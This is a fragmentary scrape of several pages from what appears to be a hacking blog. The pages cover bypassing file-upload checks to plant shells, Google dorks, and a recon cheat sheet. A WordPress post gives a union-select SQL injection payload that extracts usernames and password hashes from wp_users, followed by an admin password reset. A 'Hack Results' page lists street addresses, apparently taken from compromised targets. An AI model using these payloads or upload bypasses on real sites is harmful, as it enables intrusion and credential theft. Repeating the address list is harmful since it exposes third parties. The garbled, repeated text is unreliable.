dr3dr3.mihanblog.com
Penetration Testing - مطالب Shell Uploading ::
http://dr3dr3.mihanblog.com/post/category/16
How Bypass Security When Uploading a File. 1) Simple file upload form with no validation. Form enctype="multipart/form-data" action="uploader.php" method="POST". Input type="hidden" name="MAX FILE SIZE" value="100000" /. Choose a file to upload: input name="uploadedfile" type="file" / br /. Input type="submit" value="Upload File" /. Choose a file to upload:. Target path = "uploads/";. Target path = $target path . basename( $ FILES['uploadedfile']['name']);. Has been uploaded";. 2) Mime Type validation.
dr3dr3.mihanblog.com
Penetration Testing - How Bypass Security When Uploading a File
http://dr3dr3.mihanblog.com/post/35
How Bypass Security When Uploading a File. 1) Simple file upload form with no validation. Form enctype="multipart/form-data" action="uploader.php" method="POST". Input type="hidden" name="MAX FILE SIZE" value="100000" /. Choose a file to upload: input name="uploadedfile" type="file" / br /. Input type="submit" value="Upload File" /. Choose a file to upload:. Target path = "uploads/";. Target path = $target path . basename( $ FILES['uploadedfile']['name']);. Has been uploaded";. 2) Mime Type validation.
dr3dr3.mihanblog.com
Penetration Testing - Design a Nuke8.2 Website
http://dr3dr3.mihanblog.com/post/41
Design a Nuke8.2 Website. مرا بخاطر بسپار :. ارسال نظر خصوصی :. Find Files From open directories. Best SQL Injection Reference. LOGCOM . created by: ThemeBox.
dr3dr3.mihanblog.com
Penetration Testing - مطالب Hack Results ::
http://dr3dr3.mihanblog.com/post/category/18
1089, 3e AVENUE. 15177, RUE DE ST-AUGUSTIN. 325, REGENT STREET. 5500, RODRIGUE LOCAL #106. 3777, CHEMIN OKA. 173, BOUL. L'ANGE GARDIEN. 364, ANTONIO BARRETTE. 1240, ANGE GARDIEN NORD. 3079, BOUL. DE LA CONCORDE EST. 207, DU CENTAURE. 5021, RUE LAURIER. 569-E, BOUL. ARTHUR SAUVÉ. 21 King David St. 6 EAST 45 th STREET. NEW YORK, NY. Find Files From open directories. Best SQL Injection Reference. LOGCOM . created by: ThemeBox.
dr3dr3.mihanblog.com
Penetration Testing - Some Good Windows Software
http://dr3dr3.mihanblog.com/post/45
Some Good Windows Software. A Little PDF Reader. مرا بخاطر بسپار :. ارسال نظر خصوصی :. Find Files From open directories. Best SQL Injection Reference. LOGCOM . created by: ThemeBox.
dr3dr3.mihanblog.com
Penetration Testing - Footprinting & Reconnaissance Cheat Sheet
http://dr3dr3.mihanblog.com/post/42
Footprinting and Reconnaissance Cheat Sheet. 1) Server,OS and Domain INformation. Try this google dorks. Http:/ www.exploit-db.com/google-dorks. If you can't find an administrator's contact details in domain registrations, you can try a typical administrator address. Site:test.com "@gmail.com". Serach about target in forums and social media. 3) jobs - just for companies. Find sql injection queries. TRACERT www.site.com. In linux - sudo traceroute -T www.site.com. Type nslookup in cmd and press enter.
dr3dr3.mihanblog.com
Penetration Testing - مطالب Best Tools ::
http://dr3dr3.mihanblog.com/post/category/22
Some Good Windows Software. A Little PDF Reader. Find Files From open directories. Best SQL Injection Reference. LOGCOM . created by: ThemeBox.
dr3dr3.mihanblog.com
Penetration Testing - Google Droks For WordPress Hacking
http://dr3dr3.mihanblog.com/post/38
Google Droks For WordPress Hacking. Dork:"powered by WordPress" inurl:"/? 3 Now after 'id=' use the code which is given below. Null and 1=2 union select 1,concat( user login. 0x3a, user pass. 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2. 8 from wp users. Null and 1=2 union select 1,concat( user login. 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2. 8 from wp users. Now we just need to reset it. NOTE: Replace key= and login=. So my link will be:.
dr3dr3.mihanblog.com
Penetration Testing - مطالب Design ::
http://dr3dr3.mihanblog.com/post/category/17
Design a Nuke8.2 Website. Wordpress Codes - - - - - - - - - -. Ebteda plugine cystats ra nasb konid. Php cystats countUsersOnline();? Php cystats getSearchengineRefererCount($showmode=true);? تعداد کل مطالب :? Php cystats countPosts();? تعداد لینک ها :? Php cystats countLinks();? Php cystats countVisits(today);? Php cystats countVisits(yesterday);? بازدید این هفته :? Php cystats countVisits(week);? بازدید این ماه :? Php cystats countVisits(month);? Php cystats countVisits(all);? Php wp get archives();?
dr3dr3.mihanblog.com
Penetration Testing - Installing LAMP(linux-apache-mysql-php) in Backtrack
http://dr3dr3.mihanblog.com/post/46
Installing LAMP(linux-apache-mysql-php) in Backtrack. For phpmyadmin firs download package. Sudo apt-get install phpmyadmin. Sudo svn checkout https:/ phpmyadmin.svn.sourceforge.net/svnroot/phpmyadmin/tags/STABLE/phpMyAdmin phpMyAdmin. Sudo nano /etc/apache2/apache2.conf. Sudo /etc/init.d/apache2 start. مرا بخاطر بسپار :. ارسال نظر خصوصی :. Find Files From open directories. Best SQL Injection Reference. LOGCOM . created by: ThemeBox.